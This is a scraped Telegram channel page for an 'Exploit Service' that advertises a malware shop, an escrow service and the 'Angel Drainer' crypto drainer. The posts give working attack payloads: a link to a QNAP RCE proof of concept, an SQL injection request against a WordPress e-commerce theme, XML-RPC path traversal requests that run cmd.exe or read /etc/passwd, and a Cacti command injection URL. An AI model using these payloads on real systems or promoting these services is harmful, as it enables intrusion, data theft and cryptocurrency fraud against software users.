Exploit Service
Exploit Service | BlackHat ZERO DAY'S EXPLOITS Everything is published for informational purposes only. Private: @ExploitServiceBot Exploit Developers: @ExploitDevs All Projects: @MalwareLinks Escrow: @MalwareEscrow
Ko'proq ko'rsatish- Kanalning o'sishi
- Post qamrovi
- ER - jalb qilish nisbati
Ma'lumot yuklanmoqda...
Ma'lumot yuklanmoqda...
RCE
on a vulnerable QNAP
device.
https://github.com/watchtowrlabs/CVE-2024-27130
Private: @ExploitServiceBot
Malware Shop: @MalwareShopBot
All projects @MalwareLinks
Angel Drainer: https://t.me/+p2mOn-eGo4UzMTEx
Support: @angelsupportPoC for CVE-2024-27130. Contribute to watchtowrlabs/CVE-2024-27130 development by creating an account on GitHub.
You’ve been invited to add the folder “MalwareLinks”, which includes 38 chats.
Crypto Drainer Service The channel joined the Malware Federation Join all channels:
https://t.me/addlist/XYbneUiAZjBiYWQ0All Projects: @MalwareLinks
SQL inj
, обнаруженная в 8theme XStore, платформе электронной коммерции, созданной на базе WordPress
.
Уязвимость позволяет команды SQL в базе данных.
POC
POST /?s=%27%3B+SELECT+*+FROM+wp_posts%3B+-- HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Private: @ExploitServiceBot
Malware Shop: @MalwareShopBot
All projects @MalwareLinks
Angel Drainer: https://t.me/+p2mOn-eGo4UzMTEx
Support: @angelsupportPOST /webtools/control/xmlrpc HTTP/1.1
Host: vulnerable-host.com
Content-Type: text/xml
<?xml version="1.0"?>
<methodCall>
<methodName>performCommand</methodName>
<params>
<param>
<value><string>../../../../../../windows/system32/cmd.exe?/c+dir+c:\</string></value>
</param>
</params>
</methodCall>
POC для *NIX
POST /webtools/control/xmlrpc HTTP/1.1
Host: vulnerable-host.com
Content-Type: text/xml
<?xml version="1.0"?>
<methodCall>
<methodName>example.createBlogPost</methodName>
<params>
<param>
<value><string>../../../../../../etc/passwd</string></value>
</param>
</params>
</methodCall>
Private: @ExploitServiceBot
Malware Shop: @MalwareShopBot
All projects @MalwareLinks
Angel Drainer: https://t.me/+p2mOn-eGo4UzMTEx
Support: @angelsupporthttp://localhost/cacti/cmd_realtime.php?1+1&&calc.exe+1+1+1
Private: @ExploitServiceBot
Malware Shop: @MalwareShopBot
All projects @MalwareLinks
Angel Drainer: https://t.me/+p2mOn-eGo4UzMTEx
Support: @angelsupportJoriy rejangiz faqat 5 ta kanal uchun analitika imkoniyatini beradi. Ko'proq olish uchun, iltimos, boshqa reja tanlang.